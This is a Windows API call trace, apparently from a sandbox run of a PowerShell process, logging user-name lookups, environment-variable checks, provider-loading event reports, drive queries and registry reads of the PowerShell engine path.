	[0681.543] GetUserNameW (in: lpBuffer=0x2921e0, pcbBuffer=0x10d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d928) returned 1
	[0681.543] CoTaskMemFree (pv=0x2921e0) 
	[0681.543] ReportEventW (hEventLog=0x1b8b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x327e4c0*="Alias", lpRawData=0x327e250) returned 1
	[0681.545] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0681.545] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.545] CoTaskMemFree (pv=0x2ed7f0) 
	[0681.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0681.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0681.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0681.547] CoTaskMemAlloc (cb=0x804) returned 0x1b345860
	[0681.547] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b345860, nSize=0x10d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d8e8) returned 0x1
	[0681.548] CoTaskMemFree (pv=0x1b345860) 
	[0681.548] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.548] GetUserNameW (in: lpBuffer=0x2921e0, pcbBuffer=0x10d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d928) returned 1
	[0681.548] CoTaskMemFree (pv=0x2921e0) 
	[0681.549] ReportEventW (hEventLog=0x1b8b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3283ab8*="Environment", lpRawData=0x3283848) returned 1
	[0681.550] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0681.550] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.550] CoTaskMemFree (pv=0x2ed7f0) 
	[0681.551] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0681.551] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0681.551] CoTaskMemFree (pv=0x2ed7f0) 
	[0681.551] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0681.551] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0681.552] CoTaskMemFree (pv=0x2ed7f0) 
	[0681.552] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x10d490, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0681.552] SetErrorMode (uMode=0x1) returned 0x1
	[0681.552] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x10d6a0 | out: lpFileInformation=0x10d6a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0681.552] SetErrorMode (uMode=0x1) returned 0x1
	[0681.554] GetLogicalDrives () returned 0x4
	[0681.554] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10d200, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0681.555] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0681.555] SetErrorMode (uMode=0x1) returned 0x1
	[0681.556] CoTaskMemAlloc (cb=0x68) returned 0x1b311970
	[0681.557] CoTaskMemAlloc (cb=0x68) returned 0x1b311dd0
	[0681.557] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b311970, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x10d670, lpMaximumComponentLength=0x10d66c, lpFileSystemFlags=0x10d668, lpFileSystemNameBuffer=0x1b311dd0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x10d670*=0x9c354b42, lpMaximumComponentLength=0x10d66c*=0xff, lpFileSystemFlags=0x10d668*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0681.557] CoTaskMemFree (pv=0x1b311970) 
	[0681.557] CoTaskMemFree (pv=0x1b311dd0) 
	[0681.557] SetErrorMode (uMode=0x1) returned 0x1
	[0681.557] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0681.558] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0681.558] SetErrorMode (uMode=0x1) returned 0x1
	[0681.559] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10d610 | out: lpFileInformation=0x10d610*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0681.559] SetErrorMode (uMode=0x1) returned 0x1
	[0681.559] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0681.559] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10d260, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0681.559] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0681.560] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10d190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0681.560] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0681.560] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0681.561] SetErrorMode (uMode=0x1) returned 0x1
	[0681.561] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10d440 | out: lpFileInformation=0x10d440*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0681.561] SetErrorMode (uMode=0x1) returned 0x1
	[0681.561] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0681.561] SetErrorMode (uMode=0x1) returned 0x1
	[0681.561] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10d440 | out: lpFileInformation=0x10d440*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0681.561] SetErrorMode (uMode=0x1) returned 0x1
	[0681.562] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10d280, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0681.562] SetErrorMode (uMode=0x1) returned 0x1
	[0681.562] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10d4e0 | out: lpFileInformation=0x10d4e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0681.562] SetErrorMode (uMode=0x1) returned 0x1
	[0681.562] CoTaskMemAlloc (cb=0x804) returned 0x1b345860
	[0681.562] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b345860, nSize=0x10d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d8e8) returned 0x1
	[0681.563] CoTaskMemFree (pv=0x1b345860) 
	[0681.563] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.563] GetUserNameW (in: lpBuffer=0x2921e0, pcbBuffer=0x10d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d928) returned 1
	[0681.563] CoTaskMemFree (pv=0x2921e0) 
	[0681.563] ReportEventW (hEventLog=0x1b8b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x328aba8*="FileSystem", lpRawData=0x328a938) returned 1
	[0681.564] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0681.564] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.564] CoTaskMemFree (pv=0x2ed7f0) 
	[0681.564] CoTaskMemAlloc (cb=0x804) returned 0x1b345860
	[0681.565] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b345860, nSize=0x10d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d8e8) returned 0x1
	[0681.565] CoTaskMemFree (pv=0x1b345860) 
	[0681.565] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.565] GetUserNameW (in: lpBuffer=0x2921e0, pcbBuffer=0x10d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d928) returned 1
	[0681.565] CoTaskMemFree (pv=0x2921e0) 
	[0681.565] ReportEventW (hEventLog=0x1b8b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32903e8*="Function", lpRawData=0x3290178) returned 1
	[0681.566] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0681.566] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.566] CoTaskMemFree (pv=0x2ed7f0) 
	[0683.261] CoTaskMemAlloc (cb=0x804) returned 0x1b345860
	[0683.261] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b345860, nSize=0x10d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d8e8) returned 0x1
	[0683.261] CoTaskMemFree (pv=0x1b345860) 
	[0683.261] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0683.261] GetUserNameW (in: lpBuffer=0x2921e0, pcbBuffer=0x10d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d928) returned 1
	[0683.262] CoTaskMemFree (pv=0x2921e0) 
	[0683.262] ReportEventW (hEventLog=0x1b8b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32b2c10*="Registry", lpRawData=0x32b29a0) returned 1
	[0685.718] CoTaskMemAlloc (cb=0x804) returned 0x1b345860
	[0685.718] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b345860, nSize=0x10d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d8e8) returned 0x1
	[0685.718] CoTaskMemFree (pv=0x1b345860) 
	[0685.718] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0685.718] GetUserNameW (in: lpBuffer=0x2921e0, pcbBuffer=0x10d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d928) returned 1
	[0685.719] CoTaskMemFree (pv=0x2921e0) 
	[0685.719] ReportEventW (hEventLog=0x1b8b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32b8028*="Variable", lpRawData=0x32b7db8) returned 1
	[0685.720] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0685.720] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0685.720] CoTaskMemFree (pv=0x2ed7f0) 
	[0685.720] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0685.720] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0685.720] CoTaskMemFree (pv=0x2ed7f0) 
	[0687.558] CoTaskMemAlloc (cb=0x804) returned 0x1b34f2d0
	[0687.558] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b34f2d0, nSize=0x10d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d8e8) returned 0x1
	[0687.559] CoTaskMemFree (pv=0x1b34f2d0) 
	[0687.559] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0687.559] GetUserNameW (in: lpBuffer=0x2921e0, pcbBuffer=0x10d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d928) returned 1
	[0687.559] CoTaskMemFree (pv=0x2921e0) 
	[0687.559] ReportEventW (hEventLog=0x1b8b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32cbc40*="Certificate", lpRawData=0x32cb9d0) returned 1
	[0687.705] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0687.705] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0687.705] CoTaskMemFree (pv=0x2ed7f0) 
	[0687.709] GetLogicalDrives () returned 0x4
	[0687.709] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10d570, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0687.709] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0687.710] CoTaskMemAlloc (cb=0x20e) returned 0x2e8dd0
	[0687.710] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2e8dd0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0687.710] CoTaskMemFree (pv=0x2e8dd0) 
	[0687.712] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0687.712] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0687.712] CoTaskMemFree (pv=0x2ed7f0) 
	[0687.712] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0687.712] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0687.712] CoTaskMemFree (pv=0x2ed7f0) 
	[0687.728] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0687.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0687.728] CoTaskMemFree (pv=0x2ed7f0) 
	[0687.730] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0687.730] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0687.730] CoTaskMemFree (pv=0x2ed7f0) 
	[0687.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0687.730] SetErrorMode (uMode=0x1) returned 0x1
	[0687.730] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x10d530 | out: lpFileInformation=0x10d530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0687.731] SetErrorMode (uMode=0x1) returned 0x1
	[0687.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0687.731] SetErrorMode (uMode=0x1) returned 0x1
	[0687.731] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x10d530 | out: lpFileInformation=0x10d530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0687.731] SetErrorMode (uMode=0x1) returned 0x1
	[0687.731] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0687.731] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0687.732] CoTaskMemFree (pv=0x2ed7f0) 
	[0687.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0687.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0687.742] SetErrorMode (uMode=0x1) returned 0x1
	[0687.742] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x10d7f0 | out: lpFileInformation=0x10d7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0687.742] SetErrorMode (uMode=0x1) returned 0x1
	[0691.478] CoTaskMemAlloc (cb=0x804) returned 0x1b34f2d0
	[0691.478] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b34f2d0, nSize=0x10db58 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10db58) returned 0x1
	[0691.479] CoTaskMemFree (pv=0x1b34f2d0) 
	[0691.479] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0691.479] GetUserNameW (in: lpBuffer=0x2921e0, pcbBuffer=0x10db98 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10db98) returned 1
	[0691.479] CoTaskMemFree (pv=0x2921e0) 
	[0691.479] ReportEventW (hEventLog=0x1b8b0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3304928*="Available", lpRawData=0x33046b8) returned 1
	[0693.206] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0693.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.206] CoTaskMemFree (pv=0x2ed7f0) 
	[0693.206] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0693.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.206] CoTaskMemFree (pv=0x2ed7f0) 
	[0693.208] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0693.208] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0693.208] CoTaskMemFree (pv=0x2ed7f0) 
	[0693.208] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0693.208] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0693.208] CoTaskMemFree (pv=0x2ed7f0) 
	[0693.210] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10db78 | out: phkResult=0x10db78*=0x384) returned 0x0
	[0693.210] RegQueryValueExW (in: hKey=0x384, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10dafc, lpData=0x0, lpcbData=0x10daf8*=0x0 | out: lpType=0x10dafc*=0x1, lpData=0x0, lpcbData=0x10daf8*=0x56) returned 0x0
	[0693.210] CoTaskMemAlloc (cb=0x5a) returned 0x1b343090
	[0693.210] RegQueryValueExW (in: hKey=0x384, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10dacc, lpData=0x1b343090, lpcbData=0x10dac8*=0x56 | out: lpType=0x10dacc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10dac8*=0x56) returned 0x0
	[0693.211] CoTaskMemFree (pv=0x1b343090) 
	[0693.211] RegCloseKey (hKey=0x384) returned 0x0
	[0693.212] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0693.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.212] CoTaskMemFree (pv=0x2ed7f0) 
	[0693.225] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0693.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.225] CoTaskMemFree (pv=0x2ed7f0) 
	[0693.259] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0693.259] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.259] CoTaskMemFree (pv=0x2ed7f0) 
	[0693.259] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0693.259] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.260] CoTaskMemFree (pv=0x2ed7f0) 
	[0693.260] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0693.260] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.260] CoTaskMemFree (pv=0x2ed7f0) 
	[0693.261] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0693.261] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.261] CoTaskMemFree (pv=0x2ed7f0) 
	[0693.263] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0693.263] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.263] CoTaskMemFree (pv=0x2ed7f0) 
	[0693.263] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0693.263] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.263] CoTaskMemFree (pv=0x2ed7f0) 
	[0693.292] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0693.292] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.292] CoTaskMemFree (pv=0x2ed7f0) 
	[0702.159] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2edc30
	[0702.166] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2edd40
	[0718.691] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0718.691] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0718.692] CoTaskMemFree (pv=0x2ede50) 
	[0718.700] CoTaskMemAlloc (cb=0x104) returned 0x2ede50
	[0718.700] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ede50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0718.700] CoTaskMemFree (pv=0x2ede50) 
	[0720.478] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10dcd8 | out: phkResult=0x10dcd8*=0x2f4) returned 0x0
	[0720.478] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10dc5c, lpData=0x0, lpcbData=0x10dc58*=0x0 | out: lpType=0x10dc5c*=0x1, lpData=0x0, lpcbData=0x10dc58*=0x56) returned 0x0
	[0720.478] CoTaskMemAlloc (cb=0x5a) returned 0x1b347ac0
	[0720.478] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10dc2c, lpData=0x1b347ac0, lpcbData=0x10dc28*=0x56 | out: lpType=0x10dc2c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10dc28*=0x56) returned 0x0
	[0720.478] CoTaskMemFree (pv=0x1b347ac0) 
	[0720.478] RegCloseKey (hKey=0x2f4) returned 0x0
